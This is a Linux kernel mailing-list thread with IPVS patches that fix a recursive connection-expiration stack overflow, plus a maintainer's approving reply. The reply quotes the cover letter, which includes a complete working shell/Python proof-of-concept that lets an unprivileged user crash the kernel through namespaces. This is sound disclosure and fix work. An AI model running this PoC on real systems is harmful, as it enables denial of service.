@@ -1677,7 +1677,6 @@ static inline bool __ip_vs_conn_get(struct ip_vs_conn *cp)
 /* put back the conn without restarting its timer */
 static inline void __ip_vs_conn_put(struct ip_vs_conn *cp)
 {
-	smp_mb__before_atomic();
 	refcount_dec(&cp->refcnt);
 }
 void ip_vs_conn_put(struct ip_vs_conn *cp);
diff --git a/net/netfilter/ipvs/ip_vs_conn.c b/net/netfilter/ipvs/ip_vs_conn.c
index 6fa3e1dc534c..862731c94bce 100644
--- a/net/netfilter/ipvs/ip_vs_conn.c
+++ b/net/netfilter/ipvs/ip_vs_conn.c
@@ -293,7 +293,6 @@ static inline int ip_vs_conn_hash(struct ip_vs_conn *cp)
 	cp->flags |= IP_VS_CONN_F_HASHED;
 	WRITE_ONCE(cp->hn0.hash_key, hash_key);
 	WRITE_ONCE(cp->hn1.hash_key, hash_key2);
-	refcount_inc(&cp->refcnt);
 	hlist_bl_add_head_rcu(&cp->hn0.node, head);
 	if (use2)
 		hlist_bl_add_head_rcu(&cp->hn1.node, head2);
@@ -319,11 +318,27 @@ static inline bool ip_vs_conn_unlink(struct ip_vs_conn *cp)
 	struct hlist_bl_head *head, *head2;
 	u32 hash_key, hash_key2;
 	struct ip_vs_rht *t;
-	bool ret = false;
 	bool use2;
 
+	/* No more users and no running/pending timer except us? */
+	if (!refcount_dec_if_one(&cp->refcnt))
+		return false;
+
+	/* The ONE_PACKET connection is special:
+	 * - the flag is present only for normal connections, not for templates
+	 * - its timer is never started
+	 * - it is never hashed, so you can not find it and delete it
+	 * - it is not synced
+	 * - it has only one user
+	 * - it is freed after use immediately
+	 */
 	if (cp->flags & IP_VS_CONN_F_ONE_PACKET)
-		return refcount_dec_if_one(&cp->refcnt);
+		return true;
+
+	/* Add the needed ACQUIRE barrier between the above
+	 * refcount_dec_if_one() call and the read of cp fields
+	 */
+	smp_acquire__after_ctrl_dep();
 
 	rcu_read_lock();
 	local_bh_disable();
@@ -337,15 +352,11 @@ static inline bool ip_vs_conn_unlink(struct ip_vs_conn *cp)
 		      false /* new_hash2 */, &head, &head2);
 
 	if (cp->flags & IP_VS_CONN_F_HASHED) {
-		/* Decrease refcnt and unlink conn only if we are last user */
-		if (use2 == ip_vs_conn_use_hash2(cp) &&
-		    refcount_dec_if_one(&cp->refcnt)) {
-			hlist_bl_del_rcu(&cp->hn0.node);
-			if (use2)
-				hlist_bl_del_rcu(&cp->hn1.node);
-			cp->flags &= ~IP_VS_CONN_F_HASHED;
-			ret = true;
-		}
+		/* Unlink conn as we are the last user */
+		hlist_bl_del_rcu(&cp->hn0.node);
+		if (use2)
+			hlist_bl_del_rcu(&cp->hn1.node);
+		cp->flags &= ~IP_VS_CONN_F_HASHED;
 	}
 
 	conn_tab_unlock(head, head2);
@@ -353,7 +364,7 @@ static inline bool ip_vs_conn_unlink(struct ip_vs_conn *cp)
 	local_bh_enable();
 	rcu_read_unlock();
 
-	return ret;
+	return true;
 }
 
 
@@ -621,9 +632,12 @@ static void __ip_vs_conn_put_timer(struct ip_vs_conn *cp)
 {
 	unsigned long t = (cp->flags & IP_VS_CONN_F_ONE_PACKET) ?
 		0 : cp->timeout;
-	mod_timer(&cp->timer, jiffies+t);
 
-	__ip_vs_conn_put(cp);
+	/* Handoff our reference to the timer if it was just armed,
+	 * put the reference if timer was already pending.
+	 */
+	if (mod_timer(&cp->timer, jiffies + t))
+		__ip_vs_conn_put(cp);
 }
 
 void ip_vs_conn_put(struct ip_vs_conn *cp)
@@ -1319,9 +1333,18 @@ static void ip_vs_conn_rcu_free(struct rcu_head *head)
 	kmem_cache_free(ip_vs_conn_cachep, cp);
 }
 
-/* Try to delete connection while not holding reference */
+/* Try to delete connection while not holding reference.
+ * It can be called concurrently and always under RCU lock
+ * to protect from connection deletion from others.
+ * Used when we need to remove the connection immediately
+ * and without overloading the timer processing.
+ * OTOH, we use ip_vs_conn_expire_now() when we prefer to
+ * leave the current context (packet processing) and to
+ * remove the connection from timer.
+ */
 static void ip_vs_conn_del(struct ip_vs_conn *cp)
 {
+	/* Steal reference from the pending timer */
 	if (timer_delete(&cp->timer)) {
 		/* Drop cp->control chain too */
 		if (cp->control)
@@ -1330,20 +1353,11 @@ static void ip_vs_conn_del(struct ip_vs_conn *cp)
 	}
 }
 
-/* Try to delete connection while holding reference */
-static void ip_vs_conn_del_put(struct ip_vs_conn *cp)
-{
-	if (timer_delete(&cp->timer)) {
-		/* Drop cp->control chain too */
-		if (cp->control)
-			cp->timeout = 0;
-		__ip_vs_conn_put(cp);
-		ip_vs_conn_expire(&cp->timer);
-	} else {
-		__ip_vs_conn_put(cp);
-	}
-}
-
+/* Connection is removed in the following steps:
+ * - timer expires (with ref) or connection is deleted (with stolen ref)
+ * - there should be no more users except us (pending/running timer,
+ * n_control>0 or refcnt>1)
+ */
 static void ip_vs_conn_expire(struct timer_list *t)
 {
 	struct ip_vs_conn *cp = timer_container_of(cp, t, timer);
@@ -1359,23 +1373,18 @@ static void ip_vs_conn_expire(struct timer_list *t)
 	if (likely(ip_vs_conn_unlink(cp))) {
 		struct ip_vs_conn *ct = cp->control;
 
-		/* delete the timer if it is activated by other users */
-		timer_delete(&cp->timer);
-
 		/* does anybody control me? */
 		if (ct) {
-			bool has_ref = !cp->timeout && __ip_vs_conn_get(ct);
-
+			rcu_read_lock();
 			ip_vs_control_del(cp);
 			/* Drop CTL or non-assured TPL if not used anymore */
-			if (has_ref && !atomic_read(&ct->n_control) &&
+			if (!cp->timeout && !atomic_read(&ct->n_control) &&
 			    (!(ct->flags & IP_VS_CONN_F_TEMPLATE) ||
 			     !(ct->state & IP_VS_CTPL_S_ASSURED))) {
 				IP_VS_DBG(4, "drop controlling connection\n");
-				ip_vs_conn_del_put(ct);
-			} else if (has_ref) {
-				__ip_vs_conn_put(ct);
+				ip_vs_conn_del(ct);
 			}
+			rcu_read_unlock();
 		}
 
 		if ((cp->flags & IP_VS_CONN_F_NFCT) &&
@@ -1410,8 +1419,8 @@ static void ip_vs_conn_expire(struct timer_list *t)
 		  refcount_read(&cp->refcnt),
 		  atomic_read(&cp->n_control));
 
-	refcount_inc(&cp->refcnt);
-	cp->timeout = 60*HZ;
+	if (cp->timeout || atomic_read(&cp->n_control))
+		cp->timeout = 60 * HZ;
 
 	if (ipvs->sync_state & IP_VS_STATE_MASTER)
 		ip_vs_sync_conn(ipvs, cp, sysctl_sync_threshold(ipvs));
@@ -1429,7 +1438,7 @@ static void ip_vs_conn_expire(struct timer_list *t)
 void ip_vs_conn_expire_now(struct ip_vs_conn *cp)
 {
 	/* Using mod_timer_pending will ensure the timer is not
-	 * modified after the final timer_delete in ip_vs_conn_expire.
+	 * started without giving it new reference.
 	 */
 	if (timer_pending(&cp->timer) &&
 	    time_after(cp->timer.expires, jiffies))
@@ -1497,9 +1506,9 @@ ip_vs_conn_new(const struct ip_vs_conn_param *p, int dest_af,
 	spin_lock_init(&cp->lock);
 
 	/*
-	 * Set the entry is referenced by the current thread before hashing
-	 * it in the table, so that other thread run ip_vs_random_dropentry
-	 * but cannot drop this entry.
+	 * Set the entry as referenced by the current thread before starting
+	 * the timer and giving it our reference to allow other threads to
+	 * run ip_vs_random_dropentry() or any deletion method safely.
 	 */
 	refcount_set(&cp->refcnt, 1);
 
diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
index 5383aeafb0ae..0036ace13fdb 100644
--- a/net/netfilter/ipvs/ip_vs_sync.c
+++ b/net/netfilter/ipvs/ip_vs_sync.c
@@ -727,7 +727,7 @@ void ip_vs_sync_conn(struct netns_ipvs *ipvs, struct ip_vs_conn *cp, int pkts)
 	s->v4.vport = cp->vport;
 	s->v4.dport = cp->dport;
 	s->v4.fwmark = htonl(cp->fwmark);
-	s->v4.timeout = htonl(cp->timeout / HZ);
+	s->v4.timeout = htonl(max(1UL, cp->timeout / HZ));
 	m->nr_conns++;
 
 #ifdef CONFIG_IP_VS_IPV6
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 5+ messages in thread

* [PATCH nf v6 2/3] ipvs: avoid stack overflow from recursive connection expiration
  2026-10-05 13:06 [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
  2026-10-05 13:06 ` [PATCH nf v6 1/3] ipvs: fix problems during connection deletion Zihan Xi
@ 2026-10-05 13:06 ` Zihan Xi
  2026-10-05 13:06 ` [PATCH nf v6 3/3] ipvs: reject FTP control ports as data ports Zihan Xi
  2026-10-05 15:25 ` [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Julian Anastasov
  3 siblings, 0 replies; 5+ messages in thread
From: Zihan Xi @ 2026-10-05 13:06 UTC (permalink / raw)
  To: lvs-devel, netfilter-devel
  Cc: dsahern, idosch, horms, ja, davem, edumazet, pabeni, pablo, fw,
	phil, vega, root, zihanx

When a controlled IPVS connection expires, its controller may be expired
synchronously if it has no remaining controlled connections. A chain of
controlled connections can then recurse through ip_vs_conn_expire() and
exhaust the kernel stack during namespace cleanup.

Continue expiration with the controller after the current connection has
been fully cleaned up instead of calling ip_vs_conn_del() recursively. Keep
the expiration walk under RCU, preserve the immediate-drop timeout for a
controller with its own controller, and switch to deletion mode before the
next iteration.

This keeps controlled-connection cleanup synchronous while using one stack
frame for the whole chain. The timer callback race during connection
deletion is handled by the preceding connection-deletion fix.

This patch depends on "ipvs: fix problems during connection deletion" to
protect the iterative controller cleanup from the timer callback race.

Fixes: f9200a52eedf ("ipvs: avoid expiring many connections from timer")
Cc: stable@vger.kernel.org
Reported-by: Vega <vega@nebusec.ai>
Assisted-by: LLM
Co-developed-by: Luxing Yin <root@tr0jan.top>
Signed-off-by: Luxing Yin <root@tr0jan.top>
Signed-off-by: Zihan Xi <zihanx@nebusec.ai>
---
changes in v6:
  - Rebase the iterative cleanup on ip_vs_conn_del_reference() from
    Julian Anastasov's latest connection-deletion fix.
  - v5 Link: https://lore.kernel.org/all/cover.1790266803.git.zihanx@nebusec.ai/
changes in v5:
  - Rebase the iterative cleanup on Julian Anastasov's v3 fix.
  - v4 Link: https://lore.kernel.org/all/cover.1790146910.git.zihanx@nebusec.ai/
changes in v4:
  - Rebase controller cleanup on the timer-callback deletion fix.
  - v3 Link: https://lore.kernel.org/all/cover.1789877273.git.zihanx@nebusec.ai/
changes in v3:
  - Keep controller cleanup iterative and synchronous.
  - v2 Link: https://lore.kernel.org/all/cover.1789435989.git.zihanx@nebusec.ai/
changes in v2:
  - Replace recursive controller expiration with an iterative path.
  - v1 Link: https://lore.kernel.org/all/cover.1789110326.git.zihanx@nebusec.ai/
 net/netfilter/ipvs/ip_vs_conn.c | 40 ++++++++++++++++++++++++---------
 1 file changed, 29 insertions(+), 11 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_conn.c b/net/netfilter/ipvs/ip_vs_conn.c
index 862731c94bce..72fe609bf4ac 100644
--- a/net/netfilter/ipvs/ip_vs_conn.c
+++ b/net/netfilter/ipvs/ip_vs_conn.c
@@ -1333,9 +1333,23 @@ static void ip_vs_conn_rcu_free(struct rcu_head *head)
 	kmem_cache_free(ip_vs_conn_cachep, cp);
 }
 
-/* Try to delete connection while not holding reference.
+/* Try to steal the reference from the pending timer.
  * It can be called concurrently and always under RCU lock
  * to protect from connection deletion from others.
+ */
+static bool ip_vs_conn_del_reference(struct ip_vs_conn *cp)
+{
+	/* Steal reference from the pending timer */
+	if (!timer_delete(&cp->timer))
+		return false;
+
+	/* Drop cp->control chain too */
+	if (cp->control)
+		cp->timeout = 0;
+	return true;
+}
+
+/* Try to delete connection while not holding reference.
  * Used when we need to remove the connection immediately
  * and without overloading the timer processing.
  * OTOH, we use ip_vs_conn_expire_now() when we prefer to
@@ -1344,13 +1358,8 @@ static void ip_vs_conn_rcu_free(struct rcu_head *head)
  */
 static void ip_vs_conn_del(struct ip_vs_conn *cp)
 {
-	/* Steal reference from the pending timer */
-	if (timer_delete(&cp->timer)) {
-		/* Drop cp->control chain too */
-		if (cp->control)
-			cp->timeout = 0;
+	if (ip_vs_conn_del_reference(cp))
 		ip_vs_conn_expire(&cp->timer);
-	}
 }
 
 /* Connection is removed in the following steps:
@@ -1363,6 +1372,9 @@ static void ip_vs_conn_expire(struct timer_list *t)
 	struct ip_vs_conn *cp = timer_container_of(cp, t, timer);
 	struct netns_ipvs *ipvs = cp->ipvs;
 
+	rcu_read_lock();
+
+repeat:
 	/*
 	 *	do I control anybody?
 	 */
@@ -1372,19 +1384,18 @@ static void ip_vs_conn_expire(struct timer_list *t)
 	/* Unlink conn if not referenced anymore */
 	if (likely(ip_vs_conn_unlink(cp))) {
 		struct ip_vs_conn *ct = cp->control;
+		bool next = false;
 
 		/* does anybody control me? */
 		if (ct) {
-			rcu_read_lock();
 			ip_vs_control_del(cp);
 			/* Drop CTL or non-assured TPL if not used anymore */
 			if (!cp->timeout && !atomic_read(&ct->n_control) &&
 			    (!(ct->flags & IP_VS_CONN_F_TEMPLATE) ||
 			     !(ct->state & IP_VS_CTPL_S_ASSURED))) {
 				IP_VS_DBG(4, "drop controlling connection\n");
-				ip_vs_conn_del(ct);
+				next = ip_vs_conn_del_reference(ct);
 			}
-			rcu_read_unlock();
 		}
 
 		if ((cp->flags & IP_VS_CONN_F_NFCT) &&
@@ -1411,7 +1422,11 @@ static void ip_vs_conn_expire(struct timer_list *t)
 		else
 			call_rcu(&cp->rcu_head, ip_vs_conn_rcu_free);
 		atomic_dec(&ipvs->conn_count);
-		return;
+		if (next) {
+			cp = ct;
+			goto repeat;
+		}
+		goto out;
 	}
 
   expire_later:
@@ -1426,6 +1441,9 @@ static void ip_vs_conn_expire(struct timer_list *t)
 		ip_vs_sync_conn(ipvs, cp, sysctl_sync_threshold(ipvs));
 
 	__ip_vs_conn_put_timer(cp);
+
+out:
+	rcu_read_unlock();
 }
 
 /* Modify timer, so that it expires as soon as possible.
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 5+ messages in thread

* [PATCH nf v6 3/3] ipvs: reject FTP control ports as data ports
  2026-10-05 13:06 [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
  2026-10-05 13:06 ` [PATCH nf v6 1/3] ipvs: fix problems during connection deletion Zihan Xi
  2026-10-05 13:06 ` [PATCH nf v6 2/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
@ 2026-10-05 13:06 ` Zihan Xi
  2026-10-05 15:25 ` [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Julian Anastasov
  3 siblings, 0 replies; 5+ messages in thread
From: Zihan Xi @ 2026-10-05 13:06 UTC (permalink / raw)
  To: lvs-devel, netfilter-devel
  Cc: dsahern, idosch, horms, ja, davem, edumazet, pabeni, pablo, fw,
	phil, vega, root, zihanx

The FTP helper must not treat a configured control port as a data port.
Accepting such a port can leave IPVS connections in a state that leads
to recursive expiration and kernel stack exhaustion.

Reject zero and configured control ports before creating passive data
connections. For active mode, reject a zero client port and a derived
data port that is itself a configured control port.

Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Cc: stable@vger.kernel.org
Reported-by: Vega <vega@nebusec.ai>
Assisted-by: LLM
Co-developed-by: Luxing Yin <root@tr0jan.top>
Signed-off-by: Luxing Yin <root@tr0jan.top>
Signed-off-by: Zihan Xi <zihanx@nebusec.ai>
---
changes in v6:
  - Summarize the FTP failure mechanism in the commit message.
  - Correct the cover commands to invoke the shell-script PoCs.
changes in v5:
  - Resend the FTP helper checks as patch 3/3 after the deletion fixes.
  - v4 Link: https://lore.kernel.org/all/cover.1790146910.git.zihanx@nebusec.ai/
changes in v4:
  - Add the active-mode guard for configured FTP control ports.
  - v3 Link: https://lore.kernel.org/all/cover.1789877273.git.zihanx@nebusec.ai/
changes in v3:
  - Add the active-mode guard for configured FTP control ports.
  - v2 Link: https://lore.kernel.org/all/cover.1789435989.git.zihanx@nebusec.ai/
changes in v2:
  - Add the passive FTP checks for zero and configured control ports.
  - v1 Link: https://lore.kernel.org/all/cover.1789110326.git.zihanx@nebusec.ai/
 net/netfilter/ipvs/ip_vs_ftp.c | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/net/netfilter/ipvs/ip_vs_ftp.c b/net/netfilter/ipvs/ip_vs_ftp.c
index 9e3e005a8263..4822a1a75212 100644
--- a/net/netfilter/ipvs/ip_vs_ftp.c
+++ b/net/netfilter/ipvs/ip_vs_ftp.c
@@ -62,6 +62,17 @@ static unsigned short ports[IP_VS_APP_MAX_PORTS] = {21, 0};
 module_param_array(ports, ushort, &ports_count, 0444);
 MODULE_PARM_DESC(ports, "Ports to monitor for FTP control commands");
 
+static bool is_control_port(u16 port)
+{
+	unsigned int i;
+
+	for (i = 0; i < ports_count; i++) {
+		if (ports[i] == port)
+			return true;
+	}
+	return false;
+}
+
 
 static char *ip_vs_ftp_data_ptr(struct sk_buff *skb, struct ip_vs_iphdr *ipvsh)
 {
@@ -319,6 +330,10 @@ static int ip_vs_ftp_out(struct ip_vs_app *app, struct ip_vs_conn *cp,
 		return 1;
 	}
 
+	/* Do not redirect data to control ports */
+	if (!port || is_control_port(ntohs(port)))
+		return 0;
+
 	/* Now update or create a connection entry for it */
 	{
 		struct ip_vs_conn_param p;
@@ -529,6 +544,9 @@ static int ip_vs_ftp_in(struct ip_vs_app *app, struct ip_vs_conn *cp,
 		return 1;
 	}
 
+	if (!port || is_control_port(ntohs(cp->vport) - 1))
+		return 0;
+
 	/* Passive mode off */
 	cp->app_data = (void *) IP_VS_FTP_ACTIVE;
 
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 5+ messages in thread

* Re: [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration
  2026-10-05 13:06 [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
                   ` (2 preceding siblings ...)
  2026-10-05 13:06 ` [PATCH nf v6 3/3] ipvs: reject FTP control ports as data ports Zihan Xi
@ 2026-10-05 15:25 ` Julian Anastasov
  3 siblings, 0 replies; 5+ messages in thread
From: Julian Anastasov @ 2026-10-05 15:25 UTC (permalink / raw)
  To: Zihan Xi
  Cc: lvs-devel, netfilter-devel, dsahern, idosch, horms, davem,
	edumazet, pabeni, pablo, fw, phil, vega, root


	Hello,

On Mon, 5 Oct 2026, Zihan Xi wrote:

> Hi Linux kernel maintainers,
> 
> We found and validated a issue in
> net/netfilter/ipvs/ip_vs_ftp.c and net/netfilter/ipvs/ip_vs_conn.c. The
> bug is reachable by a non-root user via user and net namespace.
> We've tested it, and it should not affect any other functionality.
> 
> This series contains 3 patches:
> 
>   1/3 Fix problems during IPVS connection deletion.
>   2/3 Replace recursive controller expiration with an iterative cleanup
>       path.
>   3/3 Reject zero and configured FTP control ports as data ports.

	The patchset looks good to me. Thank you Zihan!

	Patch 1 already has my SOB line, so this is also
for patch 2 and 3:

Signed-off-by: Julian Anastasov <ja@ssi.bg>

> We will provide detailed information about the bug
> in this email, along with PoCs to trigger it.
> 
> ---- details below ----
> 
> Bug details:
> 
> The trigger entry point is ip_vs_ftp_out() in
> net/netfilter/ipvs/ip_vs_ftp.c. It parses a PASV or EPSV reply from the
> real server and creates a wildcard data connection from the advertised
> port. The baseline reproducer uses port 21, the default FTP control
> port. ip_vs_conn_new() then binds the FTP helper to the new connection
> again. Because the child has IP_VS_CONN_F_NO_CPORT, the next connection
> from the same client to the VIP on port 21 matches the wildcard child
> instead of creating a new top-level entry. Repeating the FTP exchange
> builds a chain of controlled connections.
> 
> The active-mode entry point, ip_vs_ftp_in(), has the same chain-building
> condition when the derived data port is a configured control port. The
> data connection's virtual port is derived from cp->vport - 1. With
> ports={21,20}, the derived port is 20, so ip_vs_conn_new() can bind the
> FTP helper again.
> 
> The FTP entry points are in ip_vs_ftp.c, but the stack-overflow root
> cause is in the generic cleanup path in ip_vs_conn.c. When a controlled
> connection expires, ip_vs_conn_expire() can delete and expire its
> controller. The old path can then call ip_vs_conn_expire() recursively.
> A long controlled-connection chain can exhaust the kernel stack. The
> reproduced failure occurs during network namespace teardown, but the
> cleanup bug is in the generic controller-chain path, not a teardown-only
> special case.
> 
> Patch 1 fixes the connection lifetime race by making the refcount account
> for active users and the pending or running timer. The deletion path can
> steal the pending timer reference, and controller-chain deletion is
> protected by RCU. The expiration path no longer relies on a separate
> timer_delete() after the reference handoff.
> 
> Patch 2 continues expiration with the controller after the current
> connection has been fully cleaned up instead of recursively calling the
> expiration path. The cleanup remains synchronous while using one stack
> frame for the whole chain. It uses the connection-deletion fix from patch
> 1 for the controller handoff.
> 
> Patch 3 rejects zero and configured FTP control ports before creating
> passive data connections in ip_vs_ftp_out(), covering both PASV and EPSV.
> It also rejects a zero active-mode client port and a data port derived
> from a configured control port in ip_vs_ftp_in(). Valid data ports
> continue through the existing path.
> 
> The recursive-cleanup root cause was introduced by
> f9200a52eedf ("ipvs: avoid expiring many connections from timer"). The FTP
> helper's acceptance of a control port is a separate root-cause fact,
> introduced by 1da177e4c3f4 ("Linux-2.6.12-rc2"). These are different
> root-cause facts, so the fixes use separate Fixes: tags.
> 
> Reproducer:
> 
> The reproducers are shell scripts with embedded Python and do not
> require compilation. The baseline reproducer was run as follows:
> 
>     SELF_UNSHARE=1 MODE=exit ./poc-original.sh 400
> 
> The v6 connection-cleanup validation was run as follows:
> 
>     SELF_UNSHARE=1 MODE=exit ./poc-original.sh 200
> 
> The passive-mode validation was run as follows:
> 
>     SELF_UNSHARE=1 MODE=exit ./poc.sh 200
> 
> The active-mode validation used the following kernel parameter and
> command:
> 
>     ip_vs_ftp.ports=21,20
>     SELF_UNSHARE=1 MODE=exit ./poc-active.sh 1
> 
> packetdrill was not used because the trigger requires namespace creation,
> the legacy IPVS sockopt ABI, a cooperating TCP server, and namespace
> teardown. packetdrill cannot express that complete control-plane setup
> and lifetime on its own.
> 
> We run the PoC in a 2 vCPU, 2 GB RAM x86 QEMU environment.
> 
> The original baseline crash was collected on 70194dc37670
> (7.3.0-rc2-g70194dc37670). The v6 series is based on nf/HEAD
> 9c572a83037a. The crash log below is retained as original trigger
> evidence; it is not presented as a validation run on the v6 baseline.
> 
> The v6 connection-cleanup validation created 200 connections and 201
> IPVS entries, completed namespace teardown, and reported no KASAN, BUG,
> Oops, panic, stack-guard, general-protection, or refcount diagnostic.
> The passive FTP validation rejected 200/200 control-port replies, kept
> 200 IPVS entries, and created zero passive data connections. The active
> FTP validation ran with DEPTH=1 (one FTP control connection), reported
> one IPVS entry before namespace teardown, and created zero derived data
> connections. Both validation runs completed namespace teardown without
> the listed kernel diagnostics.
> 
> The crash excerpt below is copied from the decoded baseline report.
> Unrelated boot output, registers, disassembly, and local execution
> paths are omitted.
> 
> Reproducer source files:
> 
> ------BEGIN poc-original.sh------
> #!/bin/sh
> set -eu
> 
> DEPTH="${1:-400}"
> MODE="${MODE:-exit}"
> SELF_UNSHARE="${SELF_UNSHARE:-0}"
> 
> if [ "${SELF_UNSHARE}" = "1" ] && [ -z "${POC_INNER:-}" ]; then
> 	exec env POC_INNER=1 MODE="${MODE}" SELF_UNSHARE=0 \
> 		unshare -Urn -- "$0" "${DEPTH}"
> fi
> 
> ulimit -n 65535 2>/dev/null || true
> 
> IP=/usr/sbin/ip
> PYTHON=/usr/bin/python3
> 
> VIP=198.51.100.1
> REAL=198.51.100.2
> CLIENT=198.51.100.3
> PORT=21
> 
> "${IP}" link set lo up
> "${IP}" addr add "${VIP}/32" dev lo 2>/dev/null || true
> "${IP}" addr add "${REAL}/32" dev lo 2>/dev/null || true
> "${IP}" addr add "${CLIENT}/32" dev lo 2>/dev/null || true
> 
> exec "${PYTHON}" - "${DEPTH}" "${MODE}" "${VIP}" "${REAL}" "${CLIENT}" "${PORT}" <<'PY'
> import ctypes
> import os
> import socket
> import sys
> import threading
> import time
> 
> depth = int(sys.argv[1])
> mode = sys.argv[2]
> vip = sys.argv[3]
> real = sys.argv[4]
> client_ip = sys.argv[5]
> port = int(sys.argv[6])
> 
> ready = threading.Event()
> server_error = []
> client_error = []
> accepted = []
> clients = []
> 
> IP_VS_BASE_CTL = 64 + 1024 + 64
> IP_VS_SO_SET_ADD = IP_VS_BASE_CTL + 2
> IP_VS_SO_SET_FLUSH = IP_VS_BASE_CTL + 5
> IP_VS_SO_SET_ADDDEST = IP_VS_BASE_CTL + 7
> 
> 
> class Svc(ctypes.Structure):
>     _fields_ = [
>         ("protocol", ctypes.c_uint16),
>         ("addr", ctypes.c_uint32),
>         ("port", ctypes.c_uint16),
>         ("fwmark", ctypes.c_uint32),
>         ("sched_name", ctypes.c_char * 16),
>         ("flags", ctypes.c_uint),
>         ("timeout", ctypes.c_uint),
>         ("netmask", ctypes.c_uint32),
>     ]
> 
> 
> class Dest(ctypes.Structure):
>     _fields_ = [
>         ("addr", ctypes.c_uint32),
>         ("port", ctypes.c_uint16),
>         ("conn_flags", ctypes.c_uint),
>         ("weight", ctypes.c_int),
>         ("u_threshold", ctypes.c_uint32),
>         ("l_threshold", ctypes.c_uint32),
>     ]
> 
> 
> def native_u32(ip):
>     return int.from_bytes(socket.inet_aton(ip), sys.byteorder)
> 
> 
> def ipvs_sock():
>     return socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
> 
> 
> def ipvs_flush():
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_FLUSH, b"")
>     finally:
>         s.close()
> 
> 
> def ipvs_add_service():
>     svc = Svc()
>     svc.protocol = socket.IPPROTO_TCP
>     svc.addr = native_u32(vip)
>     svc.port = socket.htons(port)
>     svc.fwmark = 0
>     svc.sched_name = b"rr"
>     svc.flags = 0
>     svc.timeout = 0
>     svc.netmask = 0
> 
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADD, bytes(svc))
>     finally:
>         s.close()
>     return svc
> 
> 
> def ipvs_add_dest(svc):
>     dest = Dest()
>     dest.addr = native_u32(real)
>     dest.port = socket.htons(port)
>     dest.conn_flags = 0
>     dest.weight = 1
>     dest.u_threshold = 0
>     dest.l_threshold = 0
> 
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADDDEST, bytes(svc) + bytes(dest))
>     finally:
>         s.close()
> 
> 
> def recv_line(sock):
>     data = bytearray()
>     while not data.endswith(b"\n"):
>         chunk = sock.recv(1)
>         if not chunk:
>             raise RuntimeError("unexpected EOF")
>         data.extend(chunk)
>     return bytes(data)
> 
> 
> def server():
>     try:
>         srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>         srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
>         srv.bind((real, port))
>         srv.listen(depth + 16)
>         ready.set()
>         for i in range(depth):
>             conn, addr = srv.accept()
>             conn.sendall(b"220 ready\r\n")
>             line = recv_line(conn)
>             if b"EPSV" not in line.upper():
>                 raise RuntimeError(f"unexpected request on level {i}: {line!r}")
>             conn.sendall(b"229 Entering Extended Passive Mode (|||21|)\r\n")
>             accepted.append(conn)
>         while True:
>             time.sleep(1)
>     except BaseException as exc:
>         server_error.append(repr(exc))
>         ready.set()
> 
> 
> try:
>     try:
>         ipvs_flush()
>     except OSError:
>         pass
>     service = ipvs_add_service()
>     ipvs_add_dest(service)
> except OSError as exc:
>     raise SystemExit(f"ipvs setup failed: {exc}")
> 
> 
> threading.Thread(target=server, daemon=True).start()
> ready.wait()
> if server_error:
>     raise SystemExit(f"server failed early: {server_error[0]}")
> 
> for i in range(depth):
>     try:
>         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>         s.bind((client_ip, 0))
>         s.connect((vip, port))
>         banner = recv_line(s)
>         if not banner.startswith(b"220 "):
>             raise RuntimeError(f"unexpected banner on level {i}: {banner!r}")
>         s.sendall(b"EPSV\r\n")
>         reply = recv_line(s)
>         if b"229 " not in reply:
>             raise RuntimeError(f"unexpected EPSV reply on level {i}: {reply!r}")
>         clients.append(s)
>         if (i + 1) % 50 == 0 or i + 1 == depth:
>             print(f"built {i + 1} connections", flush=True)
>     except BaseException as exc:
>         client_error.append(repr(exc))
>         break
> 
> if client_error:
>     raise SystemExit(f"client failed: {client_error[0]}")
> if server_error:
>     raise SystemExit(f"server failed: {server_error[0]}")
> 
> try:
>     with open("/proc/net/ip_vs_conn", "r", encoding="utf-8", errors="replace") as f:
>         conn_lines = sum(1 for _ in f) - 1
> except OSError:
>     conn_lines = -1
> 
> print(f"ip_vs_conn entries before trigger: {conn_lines}", flush=True)
> 
> if mode == "hold":
>     while True:
>         time.sleep(1)
> elif mode == "flush":
>     ipvs_flush()
>     print("IPVS flush returned", flush=True)
>     while True:
>         time.sleep(1)
> elif mode == "exit":
>     print("exiting namespace holder", flush=True)
>     sys.stdout.flush()
>     os._exit(0)
> else:
>     raise SystemExit(f"unknown MODE={mode!r}")
> PY
> ------END poc-original.sh--------
> 
> ------BEGIN poc.sh------
> #!/bin/sh
> set -eu
> 
> DEPTH="${1:-400}"
> MODE="${MODE:-exit}"
> SELF_UNSHARE="${SELF_UNSHARE:-0}"
> 
> if [ "${SELF_UNSHARE}" = "1" ] && [ -z "${POC_INNER:-}" ]; then
> 	exec env POC_INNER=1 MODE="${MODE}" SELF_UNSHARE=0 \
> 		unshare -Urn -- "$0" "${DEPTH}"
> fi
> 
> ulimit -n 65535 2>/dev/null || true
> 
> IP=/usr/sbin/ip
> PYTHON=/usr/bin/python3
> 
> VIP=198.51.100.1
> REAL=198.51.100.2
> CLIENT=198.51.100.3
> PORT=21
> 
> "${IP}" link set lo up
> "${IP}" addr add "${VIP}/32" dev lo 2>/dev/null || true
